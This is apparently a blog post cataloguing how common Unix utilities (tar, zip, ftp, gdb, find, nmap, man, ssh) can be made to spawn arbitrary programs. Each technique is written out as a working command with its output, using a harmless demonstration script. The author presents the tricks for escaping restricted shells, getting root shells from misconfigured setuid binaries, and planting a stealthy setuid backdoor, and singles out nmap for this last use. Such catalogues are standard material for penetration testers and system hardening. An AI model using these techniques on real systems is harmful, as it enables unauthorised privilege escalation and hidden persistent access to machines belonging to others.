I know, I know, the title may be a bit confusing. I'll explain.
Imagine that you've found your way into a router or network gateway device, but you're stuck with a lousy limited command shell that only gives you access to essential utilities. Or you've discovered that some binaries have been setuid root when they shouldn't be (like nmap), and are wondering if you can somehow spawn a root shell one way or another. Or you ARE root, and you want to plant a sneaky backdoor by making a common utility setuid root so that you can use it to regain privs later. Either way, what you're looking for is a utility with options that you can abuse to spawn any other program from that utility.
First, the test script. This echoes a message that displays the caller of the script:
$ cat test.sh
#!/bin/sh
CALLER="$(ps -o comm= $PPID)"
echo "This shell script was invoked by $CALLER">&2
$ ./test.sh
This shell script was invoked by bash
Now, the programs you can use. Many of these were taken from
this blog post by @0xmitsurugi.
tar:
$ touch dummyfile
$ tar czf dummy.tar --checkpoint=1 --checkpoint-action="exec=./test.sh" dummyfile
This shell script was invoked by tar
$ tar cf dummy2.tar -I "./test.sh" dummyfile
This shell script was invoked by tar
$ tar xf dummy.tar --to-command=./test.sh
This shell script was invoked by tar
$ tar cf fake@localhost:/fake/fake.tar --rsh-command=./test.sh dummyfile
This shell script was invoked by tar
tar: fake@localhost\:/fake/fake.tar: Cannot open: Input/output error
tar: Error is not recoverable: exiting now
zip:
$ zip dummy.zip -T -TT ./test.sh
This shell script was invoked by sh
test of dummy.zip OK
ftp, telnet, gdb etc.:
$ ftp
ftp> ! ./test.sh
This shell script was invoked by ftp
ftp> exit
$ gdb -q
(gdb) ! ./test.sh
This shell script was invoked by gdb
(gdb) exit
You can also execute commands with vim.
find (this one should be pretty obvious):
$ find -name dummyfile -exec ./test.sh \;
This shell script was invoked by find
nmap (this is awesome for stealthy backdoors, because many of nmap's functions require root anyway so setuid root is not out of the ordinary):
$ cat exec.lua
os.execute("./test.sh");
$ nmap --script exec.lua -p80 localhost
Starting Nmap 6.47 ( http://nmap.org ) at 2015-11-20 17:03 CET
NSE: Warning: Loading 'exec.lua' -- the recommended file extension is '.nse'.
This shell script was invoked by sh
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:559: exec.lua is missing required field: 'action'
stack traceback:
[C]: in function 'error'
/usr/bin/../share/nmap/nse_main.lua:559: in function 'new'
/usr/bin/../share/nmap/nse_main.lua:788: in function 'get_chosen_scripts'
/usr/bin/../share/nmap/nse_main.lua:1276: in main chunk
[C]: in ?
QUITTING!
You can also make use of
this Metasploit module.
man:
$ man -P ./test.sh man
This shell script was invoked by man
ssh (thanks to
http://www.hackdog.me/wordpress/archives/454):
$ cat ~/.ssh/config
host lol
hostname localhost
user inability
ProxyCommand ./test.sh
$ ssh lol
This shell script was invoked by ssh
ssh_exchange_identification: Connection closed by remote host
$ slogin lol
This shell script was invoked by slogin
ssh_exchange_identification: Connection closed by remote host
These are the ones I know of. Do you know of any such utilities that also have such options?
